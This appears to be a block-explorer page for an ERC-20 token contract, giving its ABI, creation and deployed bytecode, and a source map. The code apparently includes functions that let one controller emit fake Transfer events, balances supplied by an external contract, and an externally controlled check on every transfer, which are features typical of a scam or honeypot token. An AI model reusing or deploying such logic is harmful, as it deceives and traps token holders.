[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"structHash","type":"address"}],"name":"_hashTypedDataV4","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"emitTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address[]","name":"recipients","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"emitTransfers","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"uint256","name":"deadline","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

6101406040527f6e71edae12b1b97f4d1f60370fef10105fa2faae0126114a169c64845d6126c9610120523480156200003757600080fd5b50604080518082018252600680825265486f6c64656d60d01b60208084018290528451808601865292835282810191825284518086018652600480825263121bdb1960e21b828401528651808801885260018152603160f81b81850152855190942060c08181527fc89efdaa54c0f20c7adf612882df0950f5a951637e0307cdcb4c672f298b8bc660e08181524660a08181528c517f8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f818b0152808e018790526060810185905260808082019390935230818301528d518082039092018252948501808e5281519190990120905293865260e482018a52920180516001600160e01b031663020d60a960e21b1790529651959694959194869493909273bb618ac661ffe099e53e7eec5765d2a2d995174b9160009183916200017991620002ad565b6000604051808303816000865af19150503d8060008114620001b8576040519150601f19603f3d011682016040523d82523d6000602084013e620001bd565b606091505b5091505080806020019051810190620001d79190620002de565b6001600160a01b0316610100525060039450620001fd9350869250849150620003b59050565b5060046200020c8282620003b5565b50506005805460ff191660121790555050600280546d04ee2d6d415b85acef81000000009182916000906200024390849062000481565b909155505033600090815260208190526040812080548392906200026990849062000481565b909155505060405181815233906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a350620004a9565b6000825160005b81811015620002d05760208186018101518583015201620002b4565b506000920191825250919050565b600060208284031215620002f157600080fd5b81516001600160a01b03811681146200030957600080fd5b9392505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200033b57607f821691505b6020821081036200035c57634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620003b057600081815260208120601f850160051c810160208610156200038b5750805b601f850160051c820191505b81811015620003ac5782815560010162000397565b5050505b505050565b81516001600160401b03811115620003d157620003d162000310565b620003e981620003e2845462000326565b8462000362565b602080601f831160018114620004215760008415620004085750858301515b600019600386901b1c1916600185901b178555620003ac565b600085815260208120601f198616915b82811015620004525788860151825594840194600190910190840162000431565b5085821015620004715787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b80820180821115620004a357634e487b7160e01b600052601160045260246000fd5b92915050565b60805160a05160c05160e051610100516101205161130d6200050e600039600061073c01526000818161038b015281816104b7015281816105a40152610ebb015260006108f7015260006108d2015260006108570152600061087f015261130d6000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c80633644e515116100a257806395d89b411161007157806395d89b411461020b578063a457c2d714610213578063a9059cbb14610226578063d505accf14610239578063dd62ed3e1461024c57600080fd5b80633644e515146101ca57806339509351146101d257806370a08231146101e55780637ecebe00146101f857600080fd5b80631fbed0bd116100de5780631fbed0bd1461017a57806323b872dd1461018f57806323de6651146101a2578063313ce567146101b557600080fd5b806306fdde0314610110578063082f1b341461012e578063095ea7b31461014f57806318160ddd14610172575b600080fd5b610118610285565b6040516101259190610f7f565b60405180910390f35b61014161013c366004610fce565b610317565b604051908152602001610125565b61016261015d366004610fe9565b610371565b6040519015158152602001610125565b600254610141565b61018d610188366004611013565b610388565b005b61016261019d36600461109f565b61044a565b61018d6101b036600461109f565b6104b4565b60055460405160ff9091168152602001610125565b61014161053b565b6101626101e0366004610fe9565b61054a565b6101416101f3366004610fce565b610580565b610141610206366004610fce565b61063d565b61011861065b565b610162610221366004610fe9565b61066a565b610162610234366004610fe9565b6106b9565b61018d6102473660046110db565b6106c6565b61014161025a36600461114e565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b60606003805461029490611181565b80601f01602080910402602001604051908101604052809291908181526020018280546102c090611181565b801561030d5780601f106102e25761010080835404028352916020019161030d565b820191906000526020600020905b8154815290600101906020018083116102f057829003601f168201915b5050505050905090565b6000610321610853565b60405161190160f01b602082015260228101919091526bffffffffffffffffffffffff19606084901b16604282015260560160408051601f19818403018152919052805160209091012092915050565b600061037e338484610945565b5060015b92915050565b337f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316146103bd57600080fd5b60005b82811015610443578383828181106103da576103da6111bb565b90506020020160208101906103ef9190610fce565b6001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161043391815260200190565b60405180910390a36001016103c0565b5050505050565b6000610457848484610a61565b6104a984336104a48560405180606001604052806028815260200161128b602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190610bf8565b610945565b5060015b9392505050565b337f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316146104e957600080fd5b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161052e91815260200190565b60405180910390a3505050565b6000610545610853565b905090565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909161037e9185906104a49086610c2f565b60405163020bc6cd60e21b81526001600160a01b03828116600483015260009182917f0000000000000000000000000000000000000000000000000000000000000000169063082f1b3490602401602060405180830381865afa1580156105eb573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061060f91906111d1565b905060001981146106205792915050565b50506001600160a01b031660009081526020819052604090205490565b6001600160a01b038116600090815260066020526040812054610382565b60606004805461029490611181565b600061037e33846104a4856040518060600160405280602581526020016112b3602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190610bf8565b600061037e338484610a61565b8342111561071b5760405162461bcd60e51b815260206004820152601d60248201527f45524332305065726d69743a206578706972656420646561646c696e6500000060448201526064015b60405180910390fd5b6001600160a01b0387811660008181526006602090815260408083205481517f00000000000000000000000000000000000000000000000000000000000000008185015280830195909552948b166060850152608084018a905260a084019490945260c08084018990528451808503909101815260e090930190935281519190920120906107a882610317565b905060006107b882878787610c8e565b9050896001600160a01b0316816001600160a01b03161461081b5760405162461bcd60e51b815260206004820152601e60248201527f45524332305065726d69743a20696e76616c6964207369676e617475726500006044820152606401610712565b6001600160a01b038a16600090815260066020526040902061083c90610e37565b6108478a8a8a610945565b50505050505050505050565b60007f000000000000000000000000000000000000000000000000000000000000000046036108a157507f000000000000000000000000000000000000000000000000000000000000000090565b50604080517f8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f6020808301919091527f0000000000000000000000000000000000000000000000000000000000000000828401527f000000000000000000000000000000000000000000000000000000000000000060608301524660808301523060a0808401919091528351808403909101815260c0909201909252805191012090565b6001600160a01b0383166109a75760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610712565b6001600160a01b038216610a085760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610712565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910161052e565b6001600160a01b038316610ac55760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610712565b6001600160a01b038216610b275760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610712565b610b32838383610e54565b610b3b57505050565b610b7881604051806060016040528060268152602001611265602691396001600160a01b0386166000908152602081905260409020549190610bf8565b6001600160a01b038085166000908152602081905260408082209390935590841681522054610ba79082610c2f565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910161052e565b60008184841115610c1c5760405162461bcd60e51b81526004016107129190610f7f565b50610c278385611200565b949350505050565b600080610c3c8385611213565b9050838110156104ad5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610712565b60007f7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0821115610d0b5760405162461bcd60e51b815260206004820152602260248201527f45434453413a20696e76616c6964207369676e6174757265202773272076616c604482015261756560f01b6064820152608401610712565b8360ff16601b1480610d2057508360ff16601c145b610d775760405162461bcd60e51b815260206004820152602260248201527f45434453413a20696e76616c6964207369676e6174757265202776272076616c604482015261756560f01b6064820152608401610712565b6040805160008082526020820180845288905260ff871692820192909252606081018590526080810184905260019060a0016020604051602081039080840390855afa158015610dcb573d6000803e3d6000fd5b5050604051601f1901519150506001600160a01b038116610e2e5760405162461bcd60e51b815260206004820152601860248201527f45434453413a20696e76616c6964207369676e617475726500000000000000006044820152606401610712565b95945050505050565b6001816000016000828254610e4c9190611213565b909155505050565b604080516001600160a01b0385811660248301528481166044830152606482018490523360848301523260a4808401919091528351808403909101815260c490920183526020820180516001600160e01b0316633e2a289b60e11b179052915160009283927f000000000000000000000000000000000000000000000000000000000000000090911691610ee89190611226565b6000604051808303816000865af19150503d8060008114610f25576040519150601f19603f3d011682016040523d82523d6000602084013e610f2a565b606091505b5091505080806020019051810190610f429190611242565b610f505760009150506104ad565b506001949350505050565b60005b83811015610f76578181015183820152602001610f5e565b50506000910152565b6020815260008251806020840152610f9e816040850160208701610f5b565b601f01601f19169190910160400192915050565b80356001600160a01b0381168114610fc957600080fd5b919050565b600060208284031215610fe057600080fd5b6104ad82610fb2565b60008060408385031215610ffc57600080fd5b61100583610fb2565b946020939093013593505050565b6000806000806060858703121561102957600080fd5b61103285610fb2565b9350602085013567ffffffffffffffff8082111561104f57600080fd5b818701915087601f83011261106357600080fd5b81358181111561107257600080fd5b8860208260051b850101111561108757600080fd5b95986020929092019750949560400135945092505050565b6000806000606084860312156110b457600080fd5b6110bd84610fb2565b92506110cb60208501610fb2565b9150604084013590509250925092565b600080600080600080600060e0888a0312156110f657600080fd5b6110ff88610fb2565b965061110d60208901610fb2565b95506040880135945060608801359350608088013560ff8116811461113157600080fd5b9699959850939692959460a0840135945060c09093013592915050565b6000806040838503121561116157600080fd5b61116a83610fb2565b915061117860208401610fb2565b90509250929050565b600181811c9082168061119557607f821691505b6020821081036111b557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b6000602082840312156111e357600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b81810381811115610382576103826111ea565b80820180821115610382576103826111ea565b60008251611238818460208701610f5b565b9190910192915050565b60006020828403121561125457600080fd5b815180151581146104ad57600080fdfe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220869ac4880bcf8a8dd44f016cdde3b94f0cd788c4ff0ce77fe1a8385b84e26c1964736f6c63430008100033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c80633644e515116100a257806395d89b411161007157806395d89b411461020b578063a457c2d714610213578063a9059cbb14610226578063d505accf14610239578063dd62ed3e1461024c57600080fd5b80633644e515146101ca57806339509351146101d257806370a08231146101e55780637ecebe00146101f857600080fd5b80631fbed0bd116100de5780631fbed0bd1461017a57806323b872dd1461018f57806323de6651146101a2578063313ce567146101b557600080fd5b806306fdde0314610110578063082f1b341461012e578063095ea7b31461014f57806318160ddd14610172575b600080fd5b610118610285565b6040516101259190610f7f565b60405180910390f35b61014161013c366004610fce565b610317565b604051908152602001610125565b61016261015d366004610fe9565b610371565b6040519015158152602001610125565b600254610141565b61018d610188366004611013565b610388565b005b61016261019d36600461109f565b61044a565b61018d6101b036600461109f565b6104b4565b60055460405160ff9091168152602001610125565b61014161053b565b6101626101e0366004610fe9565b61054a565b6101416101f3366004610fce565b610580565b610141610206366004610fce565b61063d565b61011861065b565b610162610221366004610fe9565b61066a565b610162610234366004610fe9565b6106b9565b61018d6102473660046110db565b6106c6565b61014161025a36600461114e565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b60606003805461029490611181565b80601f01602080910402602001604051908101604052809291908181526020018280546102c090611181565b801561030d5780601f106102e25761010080835404028352916020019161030d565b820191906000526020600020905b8154815290600101906020018083116102f057829003601f168201915b5050505050905090565b6000610321610853565b60405161190160f01b602082015260228101919091526bffffffffffffffffffffffff19606084901b16604282015260560160408051601f19818403018152919052805160209091012092915050565b600061037e338484610945565b5060015b92915050565b337f00000000000000000000000065ca4291608dda82d449118987d639c6571543666001600160a01b0316146103bd57600080fd5b60005b82811015610443578383828181106103da576103da6111bb565b90506020020160208101906103ef9190610fce565b6001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161043391815260200190565b60405180910390a36001016103c0565b5050505050565b6000610457848484610a61565b6104a984336104a48560405180606001604052806028815260200161128b602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190610bf8565b610945565b5060015b9392505050565b337f00000000000000000000000065ca4291608dda82d449118987d639c6571543666001600160a01b0316146104e957600080fd5b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161052e91815260200190565b60405180910390a3505050565b6000610545610853565b905090565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909161037e9185906104a49086610c2f565b60405163020bc6cd60e21b81526001600160a01b03828116600483015260009182917f00000000000000000000000065ca4291608dda82d449118987d639c657154366169063082f1b3490602401602060405180830381865afa1580156105eb573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061060f91906111d1565b905060001981146106205792915050565b50506001600160a01b031660009081526020819052604090205490565b6001600160a01b038116600090815260066020526040812054610382565b60606004805461029490611181565b600061037e33846104a4856040518060600160405280602581526020016112b3602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190610bf8565b600061037e338484610a61565b8342111561071b5760405162461bcd60e51b815260206004820152601d60248201527f45524332305065726d69743a206578706972656420646561646c696e6500000060448201526064015b60405180910390fd5b6001600160a01b0387811660008181526006602090815260408083205481517f6e71edae12b1b97f4d1f60370fef10105fa2faae0126114a169c64845d6126c98185015280830195909552948b166060850152608084018a905260a084019490945260c08084018990528451808503909101815260e090930190935281519190920120906107a882610317565b905060006107b882878787610c8e565b9050896001600160a01b0316816001600160a01b03161461081b5760405162461bcd60e51b815260206004820152601e60248201527f45524332305065726d69743a20696e76616c6964207369676e617475726500006044820152606401610712565b6001600160a01b038a16600090815260066020526040902061083c90610e37565b6108478a8a8a610945565b50505050505050505050565b60007f000000000000000000000000000000000000000000000000000000000000000146036108a157507f245ce48022cd894c6b5cea20faf321b8456c47c66c177b551ac87519be77530d90565b50604080517f8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f6020808301919091527f737cb0f5f8b7d6496d9fb8296bb3248573ffcb7a44d3974c2764dd04ca5b834a828401527fc89efdaa54c0f20c7adf612882df0950f5a951637e0307cdcb4c672f298b8bc660608301524660808301523060a0808401919091528351808403909101815260c0909201909252805191012090565b6001600160a01b0383166109a75760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610712565b6001600160a01b038216610a085760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610712565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910161052e565b6001600160a01b038316610ac55760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610712565b6001600160a01b038216610b275760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610712565b610b32838383610e54565b610b3b57505050565b610b7881604051806060016040528060268152602001611265602691396001600160a01b0386166000908152602081905260409020549190610bf8565b6001600160a01b038085166000908152602081905260408082209390935590841681522054610ba79082610c2f565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910161052e565b60008184841115610c1c5760405162461bcd60e51b81526004016107129190610f7f565b50610c278385611200565b949350505050565b600080610c3c8385611213565b9050838110156104ad5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610712565b60007f7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0821115610d0b5760405162461bcd60e51b815260206004820152602260248201527f45434453413a20696e76616c6964207369676e6174757265202773272076616c604482015261756560f01b6064820152608401610712565b8360ff16601b1480610d2057508360ff16601c145b610d775760405162461bcd60e51b815260206004820152602260248201527f45434453413a20696e76616c6964207369676e6174757265202776272076616c604482015261756560f01b6064820152608401610712565b6040805160008082526020820180845288905260ff871692820192909252606081018590526080810184905260019060a0016020604051602081039080840390855afa158015610dcb573d6000803e3d6000fd5b5050604051601f1901519150506001600160a01b038116610e2e5760405162461bcd60e51b815260206004820152601860248201527f45434453413a20696e76616c6964207369676e617475726500000000000000006044820152606401610712565b95945050505050565b6001816000016000828254610e4c9190611213565b909155505050565b604080516001600160a01b0385811660248301528481166044830152606482018490523360848301523260a4808401919091528351808403909101815260c490920183526020820180516001600160e01b0316633e2a289b60e11b179052915160009283927f00000000000000000000000065ca4291608dda82d449118987d639c65715436690911691610ee89190611226565b6000604051808303816000865af19150503d8060008114610f25576040519150601f19603f3d011682016040523d82523d6000602084013e610f2a565b606091505b5091505080806020019051810190610f429190611242565b610f505760009150506104ad565b506001949350505050565b60005b83811015610f76578181015183820152602001610f5e565b50506000910152565b6020815260008251806020840152610f9e816040850160208701610f5b565b601f01601f19169190910160400192915050565b80356001600160a01b0381168114610fc957600080fd5b919050565b600060208284031215610fe057600080fd5b6104ad82610fb2565b60008060408385031215610ffc57600080fd5b61100583610fb2565b946020939093013593505050565b6000806000806060858703121561102957600080fd5b61103285610fb2565b9350602085013567ffffffffffffffff8082111561104f57600080fd5b818701915087601f83011261106357600080fd5b81358181111561107257600080fd5b8860208260051b850101111561108757600080fd5b95986020929092019750949560400135945092505050565b6000806000606084860312156110b457600080fd5b6110bd84610fb2565b92506110cb60208501610fb2565b9150604084013590509250925092565b600080600080600080600060e0888a0312156110f657600080fd5b6110ff88610fb2565b965061110d60208901610fb2565b95506040880135945060608801359350608088013560ff8116811461113157600080fd5b9699959850939692959460a0840135945060c09093013592915050565b6000806040838503121561116157600080fd5b61116a83610fb2565b915061117860208401610fb2565b90509250929050565b600181811c9082168061119557607f821691505b6020821081036111b557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b6000602082840312156111e357600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b81810381811115610382576103826111ea565b80820180821115610382576103826111ea565b60008251611238818460208701610f5b565b9190910192915050565b60006020828403121561125457600080fd5b815180151581146104ad57600080fdfe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220869ac4880bcf8a8dd44f016cdde3b94f0cd788c4ff0ce77fe1a8385b84e26c1964736f6c63430008100033

Deployed Bytecode Sourcemap

38403:342:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18603:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15880:192;;;;;;:::i;:::-;;:::i;:::-;;;1185:25:1;;;1173:2;1158:18;15880:192:0;1039:177:1;20911:169:0;;;;;;:::i;:::-;;:::i;:::-;;;1645:14:1;;1638:22;1620:41;;1608:2;1593:18;20911:169:0;1480:187:1;19702:108:0;19790:12;;19702:108;;25491:338;;;;;;:::i;:::-;;:::i;:::-;;21562:321;;;;;;:::i;:::-;;:::i;24814:187::-;;;;;;:::i;:::-;;:::i;19546:91::-;19620:9;;19546:91;;19620:9;;;;2909:36:1;;2897:2;2882:18;19546:91:0;2767:184:1;38214:115:0;;;:::i;22292:218::-;;;;;;:::i;:::-;;:::i;19873:289::-;;;;;;:::i;:::-;;:::i;37964:120::-;;;;;;:::i;:::-;;:::i;18813:95::-;;;:::i;23013:269::-;;;;;;:::i;:::-;;:::i;20375:175::-;;;;;;:::i;:::-;;:::i;37046:852::-;;;;;;:::i;:::-;;:::i;20613:151::-;;;;;;:::i;:::-;-1:-1:-1;;;;;20729:18:0;;;20702:7;20729:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;20613:151;18603:91;18648:13;18681:5;18674:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18603:91;:::o;15880:192::-;15955:7;16029:20;:18;:20::i;:::-;16000:62;;-1:-1:-1;;;16000:62:0;;;4744:27:1;4787:11;;;4780:27;;;;-1:-1:-1;;4845:2:1;4841:15;;;4837:53;4823:12;;;4816:75;4907:12;;16000:62:0;;;-1:-1:-1;;16000:62:0;;;;;;;;;15990:73;;16000:62;15990:73;;;;;15880:192;-1:-1:-1;;15880:192:0:o;20911:169::-;20994:4;21011:39;751:10;21034:7;21043:6;21011:8;:39::i;:::-;-1:-1:-1;21068:4:0;20911:169;;;;;:::o;25491:338::-;751:10;25621;-1:-1:-1;;;;;25605:26:0;;25597:35;;;;;;25673:13;25668:143;25692:25;;;25668:143;;;25769:10;;25780:5;25769:17;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;25752:43:0;25761:6;-1:-1:-1;;;;;25752:43:0;;25788:6;25752:43;;;;1185:25:1;;1173:2;1158:18;;1039:177;25752:43:0;;;;;;;;25719:7;;25668:143;;;;25491:338;;;;:::o;21562:321::-;21668:4;21685:36;21695:6;21703:9;21714:6;21685:9;:36::i;:::-;21732:121;21741:6;751:10;21763:89;21801:6;21763:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;21763:19:0;;;;;;:11;:19;;;;;;;;751:10;21763:33;;;;;;;;;;:37;:89::i;:::-;21732:8;:121::i;:::-;-1:-1:-1;21871:4:0;21562:321;;;;;;:::o;24814:187::-;751:10;24931;-1:-1:-1;;;;;24915:26:0;;24907:35;;;;;;24975:9;-1:-1:-1;;;;;24958:35:0;24967:6;-1:-1:-1;;;;;24958:35:0;;24986:6;24958:35;;;;1185:25:1;;1173:2;1158:18;;1039:177;24958:35:0;;;;;;;;24814:187;;;:::o;38214:115::-;38274:7;38301:20;:18;:20::i;:::-;38294:27;;38214:115;:::o;22292:218::-;751:10;22380:4;22429:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;22429:34:0;;;;;;;;;;22380:4;;22397:83;;22420:7;;22429:50;;22468:10;22429:38;:50::i;19873:289::-;19994:44;;-1:-1:-1;;;19994:44:0;;-1:-1:-1;;;;;5226:32:1;;;19994:44:0;;;5208:51:1;19947:7:0;;;;20001:10;19994:35;;;;5181:18:1;;19994:44:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;19967:71;-1:-1:-1;;;20053:40:0;;20049:69;;20102:16;19873:289;-1:-1:-1;;19873:289:0:o;20049:69::-;-1:-1:-1;;;;;;;20136:18:0;:9;:18;;;;;;;;;;;;19873:289::o;37964:120::-;-1:-1:-1;;;;;38052:14:0;;38025:7;38052:14;;;:7;:14;;;;;35378;38052:24;35286:114;18813:95;18860:13;18893:7;18886:14;;;;;:::i;23013:269::-;23106:4;23123:129;751:10;23146:7;23155:96;23194:15;23155:96;;;;;;;;;;;;;;;;;751:10;23155:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;23155:34:0;;;;;;;;;;;;:38;:96::i;20375:175::-;20461:4;20478:42;751:10;20502:9;20513:6;20478:9;:42::i;37046:852::-;37275:8;37256:15;:27;;37248:69;;;;-1:-1:-1;;;37248:69:0;;5661:2:1;37248:69:0;;;5643:21:1;5700:2;5680:18;;;5673:30;5739:31;5719:18;;;5712:59;5788:18;;37248:69:0;;;;;;;;;-1:-1:-1;;;;;37513:14:0;;;37330:18;37513:14;;;:7;:14;;;;;;;;35378;37375:204;;37404:16;37375:204;;;6104:25:1;6183:18;;;6176:43;;;;6255:15;;;6235:18;;;6228:43;6287:18;;;6280:34;;;6330:19;;;6323:35;;;;6374:19;;;;6367:35;;;37375:204:0;;;;;;;;;;6076:19:1;;;;37375:204:0;;;37351:239;;;;;;;;37626:55;37351:239;37626:16;:55::i;:::-;37618:64;-1:-1:-1;37618:64:0;37712:28;37618:64;37732:1;37735;37738;37712:13;:28::i;:::-;37695:45;;37769:5;-1:-1:-1;;;;;37759:15:0;:6;-1:-1:-1;;;;;37759:15:0;;37751:58;;;;-1:-1:-1;;;37751:58:0;;6615:2:1;37751:58:0;;;6597:21:1;6654:2;6634:18;;;6627:30;6693:32;6673:18;;;6666:60;6743:18;;37751:58:0;6413:354:1;37751:58:0;-1:-1:-1;;;;;37822:14:0;;;;;;:7;:14;;;;;:26;;:24;:26::i;:::-;37859:31;37868:5;37875:7;37884:5;37859:8;:31::i;:::-;37182:716;;;37046:852;;;;;;;:::o;14519:374::-;14580:7;14621:16;16379:9;14604:33;14600:286;;-1:-1:-1;14661:24:0;;14519:374::o;14600:286::-;-1:-1:-1;15054:165:0;;;14747:95;15054:165;;;;10962:25:1;;;;14844:12:0;11003:18:1;;;10996:34;14858:15:0;11046:18:1;;;11039:34;16379:9:0;11089:18:1;;;11082:34;15199:4:0;11132:19:1;;;;11125:61;;;;15054:165:0;;;;;;;;;;10934:19:1;;;;15054:165:0;;;15030:200;;;;;;38214:115::o;26267:346::-;-1:-1:-1;;;;;26369:19:0;;26361:68;;;;-1:-1: